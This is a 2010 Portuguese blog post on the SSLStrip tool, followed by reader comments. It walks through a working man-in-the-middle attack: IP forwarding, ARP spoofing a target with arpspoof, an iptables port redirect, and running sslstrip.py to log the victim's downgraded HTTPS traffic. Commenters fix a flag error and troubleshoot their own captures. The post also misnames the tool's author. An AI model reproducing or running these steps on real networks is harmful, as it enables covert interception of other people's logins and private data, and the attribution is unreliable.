23 de junho de 2010

SSLStrip - Capturando tráfego SSL

Desde que Moxie Moulinsart exibiu seu SSLStrip na Blackhat, o MODO PARANÓICO de muitas pessoas começou a dar o alarme, e não é pra menos, já que com essa ferramenta qualquer pessoa pode capturar seu tráfego SSL sem problemas.

O funcionamento do SSLStrip é simples, substituindo todas as requisições "https://" de uma página por "http://", e realiza um MITM (Man-In-The-Middle) entre o servidor e o cliente. A ideia é que a vítima e o atacante se comuniquem através de HTTP, enquanto o atacante e o servidor se comunicam em HTTPS, com o certificado do servidor. Portanto, o atacante é capaz de ver todo o tráfego da vítima em texto plano.

Abaixo, segue um vídeo onde podemos ver o funcionamento dessa ferramenta:



Resumidamente, os passos seriam:

Configurar o IP Forwarding:

# echo 1 > /proc/sys/net/ipv4/ip_forward

Realizar um ataque ARP MITM entre as 2 máquinas:

# arpspoof -i eth0 -t HOST_ALVO

Redirecionar o tráfego com iptables:

# iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

Iniciar o SSLStrip, definindo um arquivo onde armazenará os dados capturados:

# python sslstrip.py -w arquivo

Espero que achem interessante!

Mais informações na página oficial do SSLStrip: http://www.thoughtcrime.org/software/sslstrip/

5 comentários:

  1. Parabéns pelo post, muito bom funciona mesmo, continue postando temas de segurança hacker

    ResponderExcluir
  2. Excelente o post, vou instalar o sslstrip aqui é fazer alguns testes :)

    []'s

    ResponderExcluir
  3. root@bt:~# iptables -t nat -A PREROUTING -p tcp -destination-port 80 -j REDIRECT -to-ports 8080
    Bad argument `80'
    Try `iptables -h' or 'iptables --help' for more information.

    ResponderExcluir
  4. onde está -destination-port, substituir por --dport

    ResponderExcluir
  5. Luiz... Belo post, tenho acompanhado seus artigos. Intalei o sslstrip e sigo todos os passos recomendados porem o arquivo de log sempre fica em branco. Já conferi o redirecionamento várias vezes e não vejo nada de errado, e monitoro os pacotes do "alvo" pelo wireshark perfeitamente.

    ResponderExcluir